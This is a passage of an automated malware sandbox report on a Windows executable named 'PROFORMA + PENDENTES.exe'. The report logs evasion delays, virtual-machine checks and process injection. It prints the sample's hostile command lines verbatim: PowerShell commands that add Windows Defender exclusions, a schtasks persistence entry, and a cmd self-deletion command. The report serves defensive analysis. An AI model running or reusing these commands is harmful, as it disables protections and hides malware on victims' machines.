              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597985s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597860s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597735s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597485s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597360s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597235s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -597110s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596985s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596860s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596735s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596620s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596391s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596266s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -596047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595935s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595609s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595391s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595276s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -595047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -594938s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -594828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -594719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -594610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -594485s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -594360s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -594235s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 4152Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -27670116110564310s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -600000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 4520Thread sleep count: 7618 > 30
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 4520Thread sleep count: 2237 > 30
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599781s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599672s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599562s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599453s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599344s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599219s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599109s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -599000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598884s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598780s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598672s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598562s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598453s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598343s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598232s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598124s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -598015s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597905s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597797s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597687s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597578s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597468s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597359s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597250s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597140s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -597028s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596921s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596812s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596703s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596593s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596483s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596374s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596265s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596132s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -596031s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595921s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595812s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595703s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595593s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595484s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595375s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595265s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595156s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -595047s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -594937s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -594827s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -594716s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736Thread sleep time: -593751s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599188Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598844Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598610Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598485Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596620Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596391Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596047Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595935Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595828Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595719Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595391Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595276Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595156Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595047Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594938Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594828Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599890
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599781
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599672
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599562
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599453
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599344
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599219
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599109
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599000
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598884
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598780
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598672
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598562
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598453
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598343
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598232
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598124
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598015
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597905
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597797
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597687
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597578
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597468
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597359
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597250
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597140
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597028
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596921
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596812
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596703
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596593
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596483
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596374
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596265
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596132
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596031
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595921
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595812
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595703
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595593
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595484
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595375
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595265
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595156
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595047
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 594937
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 594827
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 594716
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 593751
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1632314031.00000000064AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1689779912.0000000000E37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1628343942.0000000001057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory written: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory written: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
